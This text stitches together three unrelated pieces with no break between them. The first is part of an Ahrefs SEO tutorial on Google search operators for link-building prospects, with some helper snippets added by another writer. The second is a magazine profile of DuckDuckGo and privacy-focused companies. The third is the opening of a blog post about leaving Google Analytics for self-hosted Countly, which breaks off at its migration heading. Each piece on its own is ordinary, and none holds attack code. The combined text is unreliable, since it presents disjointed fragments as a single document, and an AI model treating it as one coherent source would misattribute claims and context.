author:”tim soulo” -site:ahrefs.com -site:bloggerjet.com

Basically, this searches for posts by Tim Soulo. But it also excludes posts from ahrefs.com and bloggerjet.com (Tim’s personal blog).

Note. Sometimes you will find a few false positives in there. It depends on how common the person’s name happens to be.

But don’t stop there:

You can also use Content Explorer to find sites in your niche that have never linked to you.

Content Explorer > enter a topic > one article per domain > highlight unlinked domains

Here’s one of the unlinked domains I found for ahrefs.com:

[Image: marketingprofs.com highlighted as an unlinked domain]

This means marketingprofs.com has never linked to us.

Now, this search doesn’t tell us whether or not they have a “write for us” page. But it doesn’t really matter. The truth is that most sites are usually happy to accept guest posts if you can offer them “quality” content. It would, therefore, definitely be worth reaching out and “pitching” such sites.

Another benefit of using Content Explorer is that you can see stats for each page, including:

  • # of RDs;
  • DR;
  • Organic traffic estimation;
  • Social shares;
  • Etc.

You can also export the results easily. 🙂

Finally, if you’re wondering whether a specific site accepts guest posts or not, try this:

[Image: checking a specific site for guest post footprints with the site: operator]

Sidenote.

You could add even more searches—e.g., “this is a guest article”—to the list of searches included within the parentheses. I kept this simple for demonstration purposes.

6. Find resource page opportunities

“Resource” pages round up the best resources on a topic.

Here’s what a so‐called “resource” page looks like:

[Image: an example “resource” page]

All of those links you see = links to resources on other sites.

(Ironically—given the subject nature of that particular page—a lot of those links are broken)

So if you have a cool resource on your site, you can:

  1. find relevant “resource” pages;
  2. pitch your resource for inclusion

Here’s one way to find them:

[Image: a simple search for fitness “resource” pages]

But that can return a lot of junk.

Here’s a cool way to narrow it down:

[Image: narrowing the search with inurl: and intitle: operators]

Or narrow it down even further with:

[Image: an allintitle: search for fitness resources including a number range]

Sidenote.

Using allintitle: here ensures that the title tag contains the words “fitness” AND “resources,” and also a number between 5–15.

a note about the #..# operator

I know what you’re thinking:

Why not use the #..# operator instead of that long sequence of numbers?

Good point!

Let’s try it:

[Image: the #..# operator failing when combined with other operators]

Confused? Here’s the deal:

This operator doesn’t play nicely with most other operators.

Nor does it seem to work a lot of the time anyway—it’s definitely hit and miss.

So I recommend using a sequence of numbers separated by “OR” or the pipe (“|”) operator.

It’s a bit of a hassle, but it works.
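A one-liner (mine, not the article's) spares you from typing the sequence by hand:

print("(" + " OR ".join(str(n) for n in range(5, 16)) + ")")
# (5 OR 6 OR 7 OR 8 OR 9 OR 10 OR 11 OR 12 OR 13 OR 14 OR 15)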

7. Find sites that feature infographics… so you can pitch YOURS

Infographics get a bad rap.

Most likely, this is because a lot of people create low‐quality, cheap infographics that serve no real purpose… other than to “attract links.”

But infographics aren’t always bad.

Here’s the general strategy for infographics:

  1. create infographic
  2. pitch infographic
  3. get featured, get link (and PR!)

But who should you pitch your infographic to?

Just any old sites in your niche?

NO.

You should pitch to sites that are actually likely to want to feature your infographic.

The best way to do this is to find sites that have featured infographics before.

Here’s how:

[Image: searching for fitness sites that have featured infographics]

Sidenote.

It can also be worth searching within a recent date range—e.g., the past 3 months. If a site featured an infographic two years ago, that doesn’t necessarily mean they still care about infographics. Whereas if a site featured an infographic in the past few months, chances are they still regularly feature them. But as the “daterange:” operator no longer seems to work, you’ll have to do this using the in‐built filter in Google search.

But again, this can kick back some serious junk.

So here’s a quick trick:

  1. use the above search to find a good, relevant infographic (i.e., well‐designed, etc.)
  2. search for that specific infographic

Here’s an example:

[Image: searching for sites that featured the “Reddit guide to fitness” infographic]

This found ~2 results from the last 3 months. And 450+ all‐time results.

Do this for a handful of infographics and you’ll have a good list of prospects.

Not getting great results from Google? Try this.

Have you ever noticed that when an infographic is embedded on a site, the site owner will usually include the word “infographic” in square brackets in the title tag?

Example:

[Image: a title tag with “[infographic]” in square brackets]

Unfortunately, Google search ignores square brackets (even if they’re in quotes).

But Content Explorer doesn’t.

Content Explorer > search query > “AND [infographic]”

[Image: a Content Explorer search appending “AND [infographic]”]

As you can see, you can also use advanced operators in CE to search for multiple terms at once. The search above finds results containing “SEO,” “keyword research,” or “link building” in the title tag, plus “[infographic].”

You can export these easily (with all associated metrics), too.

8. Find more link prospects… AND check how relevant they really are

Let’s assume you’ve found a site that you want a link from.

It’s been manually vetted for relevance… and all looks good.

Here’s how to find a list of similar sites or pages:

[Image: a related: search for the Ahrefs blog, ~49 results]

This returned ~49 results—all of which were similar sites.

Sidenote.

In the example above, we’re looking for similar sites to Ahrefs’ blog—not Ahrefs as a whole.

want to do the same for specific pages? No problem

Let’s try our link building guide.

[Image: a related: search for our link building guide]

That’s ~45 results, all of which are very similar. 🙂

Here’s one of the results: yoast.com/seo-blog

I’m quite familiar with Yoast, so I know it’s a relevant site/prospect.

But let’s assume that I know nothing about this site, how could I quickly vet this prospect?

Here’s how:

  1. do a site:domain.com search, and note down the number of results;
  2. do a site:domain.com [niche] search, then also note down the number of results;
  3. divide the second number by the first—if it’s above 0.5, it’s a good, relevant prospect; if it’s above 0.75, it’s a super‐relevant prospect.

Let’s try this with yoast.com.

Here’s the number of results for a simple site: search:

[Image: results count for a simple site:yoast.com search]

And site: [niche]:

[Image: results count for the same site: search plus the niche keyword]

So that’s 3,330 / 3,950 = ~0.84.

(Remember, >0.75 translates to a very relevant prospect, usually)

Now let’s try the same for a site that I know to be irrelevant: greatist.com.

Number of results for site:greatist.com search: ~18,000

Number of results for site:greatist.com SEO search: ~7

(7 / 18,000 = ~0.0004 = a totally irrelevant site)
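Encoded as a tiny helper (mine, not Ahrefs’), with the two result counts gathered manually from the site: searches above:

def relevance_ratio(total_results: int, niche_results: int) -> float:
    # Share of a site's indexed pages that match the niche term.
    return niche_results / total_results

def verdict(ratio: float) -> str:
    if ratio > 0.75:
        return "super-relevant prospect"
    if ratio > 0.5:
        return "good, relevant prospect"
    return "probably irrelevant"

print(verdict(relevance_ratio(3950, 3330)))  # yoast.com: ~0.84
print(verdict(relevance_ratio(18000, 7)))    # greatist.com: ~0.0004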

IMPORTANT! This is a great way to quickly eliminate highly‐irrelevant prospects, but it’s not foolproof—you will sometimes get strange or unenlightening results. I also want to stress that it’s certainly no replacement for manually checking a potential prospect’s website. You should ALWAYS thoroughly check a prospect’s site before reaching out to them. Failure to do that = SPAMMING.

Here’s another way to find similar domains/prospects…

Site Explorer > relevant domain > Competing Domains

For example, let’s assume I was looking for more SEO‐related link prospects.

I could enter ahrefs.com/blog into Site Explorer.

Then check the Competing Domains.

[Image: the Competing Domains report in Site Explorer]

This will reveal domains competing for the same keywords.

9. Find social profiles for outreach prospects

Got someone in mind that you want to reach out to?

Try this trick to find their contact details:

[Image: a search combining a person’s name with site: operators for social networks]

Sidenote.

You NEED to know their name for this one. This is usually quite easy to find on most websites—it’s just the contact details that can be somewhat elusive.

Here are the top 4 results:

[Image: Tim Soulo’s social profiles in the top four results]

BINGO.

You can then contact them directly via social media.

Or use some of the tips from steps #4 and #6 in this article to hunt down an email address.

10. Find internal linking opportunities

Internal links are important.

They help visitors to find their way around your site.

And they also bring SEO benefits (when used wisely).

But you need to make sure that you’re ONLY adding internal links where relevant.

Let’s say that you just published a big list of SEO tips.

Wouldn’t it be cool to add an internal link to that post from any other posts where you talk about SEO tips?

Definitely.

It’s just that finding relevant places to add such links can be difficult—especially with big sites.

So here’s a quick trick:

[Image: a site: search with intext:, excluding the post we want to link to]

For those of you who still haven’t gotten the hang of search operators, here’s what this does:

  1. Restricts the search to a specific site;
  2. Excludes the page/post that you want to build internal links to;
  3. Looks for a certain word or phrase in the text.
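Put together, the pattern looks something like this (with a hypothetical blog and post URL standing in for yours):

Example: site:yourblog.com -site:yourblog.com/seo-tips intext:”seo tips”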

Here’s one opportunity I found with this operator:

[Image: an internal linking opportunity surfaced by the search]

It took me all of ~3 seconds to find this. 🙂

11. Find PR opportunities by finding competitor mentions

Here’s a page that mentions a competitor of ours—Moz.

[Image: a page dedicated to how to use Moz]

Found using this advanced search:

[Image: the advanced search used to find competitor mentions]

But why no mention of Ahrefs? 🙁

Using site: and intext:, I can see that this site has mentioned us a couple of times before.

[Image: site: and intext: showing this site’s existing Ahrefs mentions]

But they haven’t written any posts dedicated to our toolset, as they have with Moz.

This presents an opportunity.

Reach out, build a relationship, then perhaps they may write about Ahrefs.

Here’s another cool search that can be used to find competitor reviews:

[Image: an allintitle: search for competitor reviews]

Sidenote.

Because we’re using “allintitle” rather than “intitle,” this will match only results with both the word “review” and one of our competitors in the title tag.

You can build relationships with these people and get them to review your product/service too.

Go even further with Content Explorer

You can also use the “In title” search in Content Explorer to find competitor reviews.

I tried this for Ahrefs and found 795 results.

[Image: 795 competitor review results in Content Explorer]

For clarity, here’s the exact search I used:

review AND (moz OR semrush OR majestic) -site:moz.com -site:semrush.com -site:majestic.com

But you can go even further by highlighting unlinked mentions.

This highlights the sites that have never linked to you before, so you can then prioritise them.

Here’s one site that has never linked to Ahrefs, yet has reviewed our competitor:

[Image: a site that reviewed a competitor but has never linked to Ahrefs]

You can see that it’s a Domain Rating (DR) 79 website, so it would be well worth getting a mention on this site.

Here’s another cool tip:

Google’s daterange: operator is now deprecated. But you can still add a time period filter to find recent competitor mentions.

Just use the inbuilt filter.

Tools > Any time > select time period

[Image: Google’s time period filter applied to the competitor-review search]

Looks like ~34 reviews of our competitors were published in the past month.

Want alerts for competitor mentions in real‐time? Do this.

Alerts > Mentions > Add alert

Enter the name of your competitor… or any search query you like.

Choose a mode (either “in title” or “everywhere”), add your blocked domains, then add a recipient.

[Image: setting up an Ahrefs Alert for competitor mentions]

Set your interval to real‐time (or whatever interval you prefer).

Hit “Save.”

You will now receive an email whenever your competitors are mentioned online.

12. Find sponsored post opportunities

Sponsored posts are paid‐for posts promoting your brand, product or service.

These are NOT link building opportunities.

Google’s guidelines state the following:

Buying or selling links that pass PageRank. This includes exchanging money for links, or posts that contain links; exchanging goods or services for links; or sending someone a “free” product in exchange for them writing about it and including a link

This is why you should ALWAYS nofollow links in sponsored posts.

But the true value of a sponsored post doesn’t come down to links anyway.

It comes down to PR—i.e., getting your brand in front of the right people.

Here’s one way to find sponsored post opportunities using Google search operators:

[Image: a search for sponsored posts in a niche, ~151 results]

~151 results. Not bad.

Here are a few other operator combinations to use:

  • [niche] intext:”this is a sponsored post by”
  • [niche] intext:”this post was sponsored by”
  • [niche] intitle:”sponsored post”
  • [niche] intitle:”sponsored post archives” inurl:”category/sponsored-post”
  • “sponsored” AROUND(3) “post”

Sidenote.

The examples above are exactly that—examples. There are almost certainly other footprints you can use to find such posts. Don’t be afraid to try other ideas.

Want to know how much traffic each of these sites get? Do this.

Use this Chrome bookmarklet to extract the Google search results.

Batch Analysis > paste the URLs > select “domain/*” mode > sort by organic search traffic

[Image: Batch Analysis results sorted by organic search traffic]

Now you have a list of the sites with the most traffic, which are usually the best opportunities.

13. Find Q+A threads related to your content

Forums and Q+A sites are great for promoting content.

Sidenote.

Promoting != spamming. Don’t join such sites just to add your links. Provide value and drop the occasional relevant link in there in the process.

One site that comes to mind is Quora.

Quora allows you to drop relevant links throughout your answers.

[Image: an answer on Quora with a link to an SEO blog.]

It’s true that these links are nofollowed.

But we’re not trying to build links here—this is about PR!

Here’s one way to find relevant threads:

[Image: finding relevant Quora threads with the site: operator]

Don’t limit yourself to Quora, though.

This can be done with any forum or Q+A site.

Here’s the same search for Warrior Forum:

[Image: the same search for Warrior Forum]

I also know that Warrior Forum has a search engine optimization category.

Every thread in this category has “.com/search-engine-optimization/” in the URL.

So I could refine my search even further with the inurl: operator.

[Image: refining the search with the inurl: operator]
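That refined search looks something like this (my reconstruction, with a hypothetical keyword):

Example: site:warriorforum.com inurl:search-engine-optimization “link building”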

I’ve found that using search operators like this allows you to search forum threads with more granularity than most on‐site searches.

Here’s another cool trick…

Site Explorer > quora.com > Organic Keywords > search for a niche‐relevant keyword

You should now see relevant Quora threads sorted by estimated monthly organic traffic.

[Image: relevant Quora threads sorted by estimated monthly organic traffic]

Answering such threads can lead to a nice trickle of referral traffic.

14. Find how often your competitors are publishing new content

Most blogs reside in a subfolder or on a subdomain.

Examples: a blog in a subfolder (like ahrefs.com/blog) or on a subdomain (like blog.example.com).

This makes it easy to check how regularly competitors are publishing new content.

Let’s try this for one of our competitors—SEMrush.

[Image: a site: search for the SEMrush blog]

Looks like they have ~4.5K blog posts.

But this isn’t accurate. It includes multi‐language versions of the blog, which reside on subdomains.

[Image: multi-language blog subdomains inflating the count]

Let’s filter these out.

[Image: the same search with subdomain results filtered out]

That’s more like it. ~2.2K blog posts.

Now we know our competitor (SEMrush) has ~2.2K blog posts in total.

Let’s see how many they published in the last month.

Because the daterange: operator no longer works, we’ll instead use Google’s inbuilt filter.

Tools > Any time > select time period

[Image: competitor blog posts published in the last month]

Sidenote.

Any date range is possible here. Just select “custom.”

~29 blog posts. Interesting.

FYI, that’s ~4x faster than we publish new posts. And they have ~15x more posts than us in total.

But we still get more traffic… with ~2x the value, might I add 😉

[Image: Ahrefs vs. competitor organic traffic]

Quality over quantity, right!?

You can also use the site: operator combined with a search query to see how much content a competitor has published on a certain topic.

[Image: site: operator combined with a topic search]

15. Find sites linking to competitors

Competitors getting links?

What if you could also have them?

Google’s link: operator was officially deprecated in 2017.

But I’ve found that it does still return some results.

[Image: link: search for a competitor]

Sidenote.

When doing this, always make sure to exclude your competitor’s site using the -site: operator. If you don’t, you’ll also see their internal links.

~900K links.

Want to see even more links?

Google’s data is heavily sampled.

It likely isn’t too accurate either.

Site Explorer can provide a much fuller picture of your competitor’s backlink profile.

[Image: competitor backlinks in Site Explorer]

~1.5 million backlinks.

That’s a lot more than Google showed us.

This is yet another instance where the time period filter can be useful.

Filtering by the last month, I can see that Moz has gained 18K+ new backlinks.

[Image: competitor links gained in the last month]

Pretty useful. But this also illustrates how inaccurate this data can be.

Site Explorer picked up 35K+ links for this same period.

[Image: 35K+ links in Site Explorer]

That’s almost DOUBLE!

Final Thoughts

Google advanced search operators are insanely powerful.

You just have to know how to use them.

But I have to admit that some are more useful than others, especially when it comes to SEO. I find myself using site:, intitle:, intext:, and inurl: on an almost daily basis. Yet I rarely use AROUND(X), allintitle:, and many of the other more obscure operators.

I’d also add that many operators are borderline useless unless paired with another operator…


Nothing Can Stop Google. DuckDuckGo Is Trying Anyway.

In late November, hotel conglomerate Marriott International disclosed that the personal information of some 500 million customers — including home addresses, phone numbers, and credit card numbers — had been exposed as part of a data breach affecting its Starwood Hotels and Resorts network. One day earlier, the venerable breakfast chain Dunkin’ (née Donuts) announced that its rewards program had been compromised. Only two weeks before that, it was revealed that a major two-factor authentication provider had exposed millions of temporary account passwords and reset links for Google, Amazon, HQ Trivia, Yahoo, and Microsoft users.

These were just the icing on the cake for a year of compromised data: Adidas, Orbitz, Macy’s, Under Armour, Sears, Forever 21, Whole Foods, Ticketfly, Delta, Panera Bread, and Best Buy, just to name a few, were all affected by security breaches.

Meanwhile, there’s a growing sense that the tech giants have finally turned on their users. Amazon dominates so many facets of the online shopping experience that legislators may have to rewrite antitrust law to rein them in. Google has been playing fast and loose with its “Don’t Be Evil” mantra by almost launching a censored search engine for the Chinese government while simultaneously developing killer A.I. for Pentagon drones. And we now know that Facebook collected people’s personal data without their consent, had third-party deals that would have allegedly made it possible for Spotify and Netflix to look at users’ private messages, fueled fake news and the rise of Donald Trump, and was used to facilitate a genocide in Myanmar.

The backlash against these companies dominated our national discourse in 2018. The European Union is cracking down on anticompetitive practices at Amazon and Google. Both Facebook and Twitter have had their turns in the congressional hot seat, facing questions from slightly confused but definitely irate lawmakers about how the two companies choose what information to show us and what they do with our data when we’re not looking. Worries over privacy have led everyone from the New York Times to Brian Acton, the disgruntled co-founder of Facebook-owned WhatsApp, to call for a Facebook exodus. And judging by Facebook’s stagnating rate of user growth, people seem to be listening.

For Gabriel Weinberg, the founder and CEO of privacy-focused search engine DuckDuckGo, our growing tech skepticism recalls the early 1900s, when Upton Sinclair’s novel The Jungle revealed the previously unexamined horrors of the meatpacking industry. “Industries have historically gone through periods of almost ignorant bliss, and then people start to expose how the sausage is being made,” he says.

[Image: Gabriel Weinberg, DuckDuckGo CEO and founder]

This, in a nutshell, is DuckDuckGo’s proposition: “The big tech companies are taking advantage of you by selling your data. We won’t.” In effect, it’s an anti-sales sales pitch. DuckDuckGo is perhaps the most prominent in a number of small but rapidly growing firms attempting to make it big — or at least sustainable — by putting their customers’ privacy and security first. And unlike the previous generation of privacy products, such as Tor or SecureDrop, these services are easy to use and intuitive, and their user bases aren’t exclusively composed of political activists, security researchers, and paranoiacs. The same day Weinberg and I spoke, DuckDuckGo’s search engine returned results for 33,626,258 queries — a new daily record for the company. Weinberg estimates that since 2014, DuckDuckGo’s traffic has been increasing at a rate of “about 50 percent a year,” a claim backed up by the company’s publicly available traffic data.


“You can run a profitable company — which we are — without [using] a surveillance business model,” Weinberg says. If he’s right, DuckDuckGo stands to capitalize handsomely off our collective backlash against the giants of the web economy and establish a prominent brand in the coming era of data privacy. If he’s wrong, his company looks more like a last dying gasp before surveillance capitalism finally takes over the world.

DuckDuckGo is based just east of nowhere. Not in the Bay Area, or New York, or Weinberg’s hometown of Atlanta, or in Boston, where he and his wife met while attending MIT. Instead, DuckDuckGo headquarters is set along a side street just off the main drag of Paoli, Pennsylvania, in a building that looks like a cross between a Pennsylvania Dutch house and a modest Catholic church, on the second floor above a laser eye surgery center. Stained-glass windows look out onto the street, and a small statue of an angel hangs precariously off the roof. On the second floor, a door leading out to a balcony is framed by a pair of friendly looking cartoon ducks, one of which wears an eye patch. Just before DuckDuckGo’s entrance sits a welcome mat that reads “COME BACK WITH A WARRANT.”

“People don’t generally show up at our doorstep, but I hope that at some point it’ll be useful,” Weinberg tells me, sitting on a couch a few feet from an Aqua Teen Hunger Force mural that takes up a quarter of a wall. At 39, he is energetic, affable, and generally much more at ease with himself than the stereotypical tech CEO. The office around us looks like it was furnished by the set designer of Ready Player One: a Hitchhiker’s Guide to the Galaxy print in the entryway, Japanese-style panels depicting the Teenage Mutant Ninja Turtles in the bathroom, and a vintage-looking RoboCop pinball machine in the break room. There’s even a Lego model of the DeLorean from Back to the Future on his desk. The furniture, Weinberg tells me, is mostly from Ikea. The lamp in the communal area is a hand-me-down from his mom.

Weinberg learned basic programming on an Atari while he was still in elementary school. Before hitting puberty, he’d built an early internet bulletin board. “It didn’t really have a purpose” in the beginning, Weinberg says. The one feature that made his bulletin board unique, he says, was that he hosted anonymous AMA-style question panels with his father, an infectious disease doctor with substantial experience treating AIDS patients. This was during the early 1990s, when the stigma surrounding HIV and AIDS remained so great that doctors were known to deny treatment to those suffering from it. Weinberg says that the free—and private—medical advice made the board a valuable resource for the small number of people who found it. It was an early instance of Weinberg’s interest in facilitating access to information, as well as a cogent example of the power of online privacy: “The ability to access informational resources anonymously actually opens up that access significantly,” he told me over email.

After graduating from MIT in 2001, Weinberg launched a slew of businesses, none of which are particularly memorable. First there was an educational software program called Learnection. (“Terrible name… the idea was good, but 15 years too early,” he says.) Then he co-founded an early social networking company called Opobox, taking on no employees and writing all the code himself. “Facebook just kind of obliterated it,” Weinberg says, though he was able to sell the network to the parent company of Classmates.com for roughly $10 million in cash in 2006.

It was around that time when Weinberg began working on what would become DuckDuckGo. Google had yet to achieve total hegemony over the internet search field, and Weinberg felt that he could create a browser plugin that might help eliminate the scourge of spammy search results in other search engines.


To build an algorithm that weeded out bad search results, he first had to do it by hand. “I took a large sample of different pages and hand-marked them as ‘spam’ or ‘not spam.’” The process of scraping the web, Weinberg says, inadvertently earned him a visit from the FBI. “Once they realized I was just crawling the web, they just went away,” he says. He also experimented with creating a proto-Quora service that allowed anyone to pose a question and have it answered by someone else, as well as a free alternative to Meetup.com. Eventually, he combined facets of all three efforts into a full-on search engine.

When Weinberg first launched DuckDuckGo in 2008 — the name is a wink to the children’s game of skipping over the wrong options to get to the right one — he differentiated his search engine by offering instant answers to basic questions (essentially an early open-source version of Google’s Answer Box), spam filtering, and highly customizable search results based on user preferences. “Those [were] things that early adopters kind of appreciated,” he says.

At the time, Weinberg says, consumer privacy was not a central concern. In 2009, when he made the decision to stop collecting personal search data, it was more a matter of practicality than a principled decision about civil liberties. Instead of storing troves of data on every user and targeting those users individually, DuckDuckGo would simply sell ads against search keywords. Most of DuckDuckGo’s revenue, he explains, is still generated this way. The system doesn’t capitalize on targeted ads, but, Weinberg says, “I think there’s a choice between squeezing out every ounce of profit and making ethical decisions that aren’t at the expense of society.”

Until 2011, Weinberg was DuckDuckGo’s sole full-time employee. That year, he pushed to expand the company. He bought a billboard in Google’s backyard of San Francisco that proudly proclaimed, “Google tracks you. We don’t.” (That defiant gesture and others like it were later parodied on HBO’s Silicon Valley.) The stunt paid off in spades, doubling DuckDuckGo’s daily search traffic. Weinberg began courting VC investors, eventually selling a minority stake in the company to Union Square Ventures, the firm that has also backed SoundCloud, Coinbase, Kickstarter, and Stripe. That fall, he hired his first full-time employee, and DuckDuckGo moved out of Weinberg’s house and into the strangest-looking office in all of Paoli, Pennsylvania.

Then, in 2013, digital privacy became front-page news. That year, NSA contractor Edward Snowden leaked a series of documents to the Guardian and the Washington Post revealing the existence of the NSA’s PRISM program, which granted the agency unfettered access to the personal data of millions of Americans through a secret back door into the servers of Google, Yahoo, Facebook, Apple, and other major internet firms. Though Google denied any knowledge of the program, the reputational damage had been done. DuckDuckGo rode a wave of press coverage, enjoying placement in stories that offered data privacy solutions to millions of newly freaked-out people worried that the government was spying on them.

“All of a sudden we were part of this international story,” Weinberg says. The next year, DuckDuckGo turned a profit. Shortly thereafter, Weinberg finally started paying himself a salary.

Today, DuckDuckGo employs 55 people, most of whom work remotely from around the world. (On the day I visited, there were maybe five employees in the Paoli office, plus one dog.) This year, the company went through its second round of VC funding, accepting a $10 million investment from Canadian firm OMERS. Weinberg insists that both OMERS and Union Square Ventures are “deeply interested in privacy and restoring power to the non-monopoly providers.” Later, via email, Weinberg declined to share DuckDuckGo’s exact revenue, beyond the fact that its 2018 gross revenue exceeded $25 million, a figure the company has chosen to disclose in order to stress that it is subject to the California Consumer Privacy Act. Weinberg feels that the company’s main challenge these days is improving brand recognition.

“I don’t think there’s many trustworthy entities on the internet, just straight-up,” he says. “Ads follow people around. Most people have gotten multiple data breaches. Most people know somebody who’s had some kind of identity theft issue. The percentage of people who’ve had those events happen to them has just grown and grown.”

The recent investment from OMERS has helped cover the cost of DuckDuckGo’s new app, launched in January 2018. The app, a lightweight mobile web browser for iOS and Android that’s also available as a Chrome plugin, is built around the DuckDuckGo search engine. It gives each site you visit a letter grade based on its privacy practices and has an option to let you know which web trackers — usually ones from Google, Facebook, or Comscore — it blocked from monitoring your browsing activity. After you’ve finished surfing, you can press a little flame icon and an oddly satisfying animated fire engulfs your screen, indicating that you’ve deleted your tabs and cleared your search history.

The rest of the recent investment, Weinberg says, has been spent on “trying to explain to people in the world that [DuckDuckGo] exists.” He continues, “That’s our main issue — the vast majority of people don’t realize there’s a simple solution to reduce their [online] footprint.” To that end, DuckDuckGo maintains an in-house consumer advocacy blog called Spread Privacy, offering helpful tips on how to protect yourself online as well as commentary and analysis on the state of online surveillance. Its most recent initiative was a study on how filter bubbles — the term for how a site like Google uses our data to show us what it thinks we want — can shape the political news we consume.

Brand recognition is a challenge for a lot of startups offering privacy-focused digital services. After all, the competition includes some of the biggest and most prominent companies in the world: Google, Apple, Facebook. And in some ways, this is an entire new sector of the market. “Privacy has traditionally not been a product; it’s been more like a set of best practices,” says David Temkin, chief product officer for the Brave web browser. “Imagine turning that set of best practices into a product. That’s kind of where we’re going.”

Like DuckDuckGo — whose search engine Brave incorporates into its private browsing mode — Brave doesn’t collect user data and blocks ads and web trackers by default. In 2018, Brave’s user base exploded from 1 million to 5.5 million, and the company reached a deal with HTC to be the default browser on the manufacturer’s upcoming Exodus smartphone.


Temkin, who first moved out to the Bay Area in the early ’90s to work at Apple, says that the past two decades of consolidation under Google/Facebook/Netflix/Apple/Amazon have radically upended the notion of the internet as a safe haven for the individual. “It’s swung back to a very centralized model,” he says. “The digital advertising landscape has turned into a surveillance ecosystem. The way to optimize the value of advertising is through better targeting and better data collection. And, well, water goes downhill.”

In companies such as Brave and DuckDuckGo, Temkin sees a return to the more conscientious attitude behind early personal computing. “I think to an ordinary user, [privacy] is starting to sound like something they do need to care about,” he says.

But to succeed, these companies will have to make privacy as accessible and simple as possible. “Privacy’s not gonna win if it’s a specialist tool that requires an expert to wield,” Temkin says. “What we’re doing is trying to package [those practices] in a way that’s empathetic and respectful to the user but doesn’t impose the requirement for knowledge or the regular ongoing annoyance that might go with maintaining privacy on your own.”

In November, I decided to switch my personal search querying to DuckDuckGo in order to see whether it was a feasible solution to my online surveillance woes. Physically making the switch is relatively seamless. The search engine is already an optional default in browsers such as Safari, Microsoft Edge, and Firefox, as well as more niche browsers such as Brave and Tor, the latter of which made DuckDuckGo its default search in 2016.

Actually using the service, though, can be slightly disorienting. I use Google on a daily basis for one simple reason: It’s easy. When I need to find something online, it knows what to look for. To boot, it gives me free email, which is connected to the free word processor that my editor and I are using to work on this article together in real time. It knows me. It’s only when I consider the implications of handing over a digital record of my life to a massive company that the sense of free-floating dread about digital surveillance kicks in. Otherwise, it’s great. And that’s the exact hurdle DuckDuckGo is trying to convince people to clear.

Using DuckDuckGo can feel like relearning to walk after you’ve spent a decade flying. On Google, a search for, say, “vape shop” yields a map of vape shops in my area. On DuckDuckGo, that same search returns a list of online vaporizer retailers. The difference, of course, is the data: Google knows that I’m in Durham, North Carolina. As far as DuckDuckGo is concerned, I may as well be on the moon.

That’s not to say using DuckDuckGo is all bad. For one, it can feel mildly revelatory knowing that you’re seeing the same search results that anyone else would. It restores a sense of objectivity to the internet at a time when being online can feel like stepping into The Truman Show — a world created to serve and revolve around you. And I was able to look up stuff I wanted to know about — how to open a vacuum-sealed mattress I’d bought off the internet, the origin of the martingale dog collar, the latest insane thing Donald Trump did — all without the possibility of my search history coming back to haunt me in the form of ads for bedding, dog leashes, or anti-Trump knickknacks. Without personalized results, DuckDuckGo just needs to know what most people are looking for when they type in search terms and serve against that. And most of the time, we fit the profile of most people.

When I asked Weinberg if he wanted to displace Google as the top search engine in all the land, he demurred. “I mean, I wouldn’t be opposed to it,” he says, “but it’s really not our intention, and I don’t expect that to happen.” Instead, he’d like to see DuckDuckGo as a “second option” to Google for people who are interested in maintaining their online anonymity. “Even if you don’t have anything to hide, it doesn’t mean you want people to profit off your information or be manipulated or biased against as a result [of that information],” he says.

Even though DuckDuckGo may serve a different market and never even challenge Google head-on, the search giant remains its largest hurdle in the long term. For more than a decade, Google has been synonymous with search. And that association is hard, if not impossible, to break.

In the meantime, the two companies are on frosty terms. In 2010, Google obtained the domain duck.com as part of a larger business deal with a company formerly known as Duck Co. For years, the domain would redirect to Google’s search page, despite seeming like something you’d type into your browser while trying to get to DuckDuckGo. After DuckDuckGo petitioned for ownership for nearly a decade, Google finally handed over the domain in December. The acquisition was a minor branding coup for DuckDuckGo — and a potential hedge against accusations of antitrust for Google.

That doesn’t mean relations between the two companies have improved. As the Goliath in the room, Google could attempt to undercut DuckDuckGo’s entire business proposition. Over the past few years, even mainstream players have attempted to assuage our privacy anxieties by offering VPNs (Verizon), hosting “privacy pop-ups” (Facebook), and using their billions to fight against state surveillance in court (Microsoft). With some tweaks, Google could essentially copy DuckDuckGo wholesale and create its own privacy-focused search engine with many of the same protections DuckDuckGo has built its business on. Whether people would actually believe that Google, a company that muscled its way into becoming an integral part of the online infrastructure by selling people’s data, could suddenly transform into a guardian of that data remains to be seen.

When it comes to the internet, trust is something easily lost and difficult to regain. In a sense, every time a giant of the internet surveillance economy is revealed to have sold out its customers in some innovatively horrifying way, the ensuing chaos almost serves as free advertising for DuckDuckGo. “The world keeps going in a bad direction, and it makes people think, ‘Hey, I would like to escape some of the bad stuff on the internet and go to a safer place,’” Weinberg says. “And that’s where we see ourselves.”


On Migrating from Google Analytics


In this post we’ll explore what happened when I migrated away from Google Analytics (GA) to a self-hosted solution. The tool that I migrated to is an open-source platform called Countly. It offers a subset of the features that GA offers.

When creating content for this website my typical flow is to first publish a post, then submit it to sites like Hacker News and Reddit, and keep an eye on analytics for a couple days to see how it does. This helps me figure out what my audience finds interesting.

There are a few questions that I need an analytics solution to be able to answer for me:

  • What posts are popular this week?
  • How is the site doing compared to last week?
  • Which pages were featured and on which social media platforms?

Spoiler: Neither tool can succinctly answer the third question. Ideally an analytics tool would display an “event”: some sort of marker on the timeline when a certain threshold of traffic from a source is met. That is, I want to know that “Migrating from WordPress to Static Markdown” was featured on /r/node.
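
As a rough illustration of the feature I have in mind, here's a TypeScript sketch that flags the first day a referrer crosses a traffic threshold. The Hit shape and the 50-hits-per-day threshold are assumptions for illustration, not anything Countly or GA actually exposes:

```ts
interface Hit {
  referrer: string; // e.g. "reddit.com/r/node"
  timestamp: Date;
}

// Returns a map of referrer -> the first day it crossed the threshold.
function referralSpikes(hits: Hit[], threshold = 50): Map<string, string> {
  const dailyCounts = new Map<string, number>(); // "referrer|day" -> hit count
  const firstSpike = new Map<string, string>();
  for (const hit of hits) {
    const day = hit.timestamp.toISOString().slice(0, 10); // "YYYY-MM-DD"
    const key = `${hit.referrer}|${day}`;
    const count = (dailyCounts.get(key) ?? 0) + 1;
    dailyCounts.set(key, count);
    if (count === threshold && !firstSpike.has(hit.referrer)) {
      firstSpike.set(hit.referrer, day);
    }
  }
  return firstSpike;
}
```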

I had already installed Countly on a VPS for keeping track of events generated by a mobile game I published, Cobalt Dungeon (this was a replacement for a massively overpriced event tracking system, Mixpanel). Having it installed was convenient because the server was already up and listening. I simply needed to create another “application” using their multi-tenant-friendly UI and I was ready to go.

Why Migrate

Honestly, it was mostly due to philosophical reasons. The Internet has become increasingly centralized over the years. I really want a website that someone can visit and all the resources are served by domains that I own. With this change I am much closer to that goal (though most pages carry an unobtrusive advertisement, which is still loaded from a third party).

The Migration

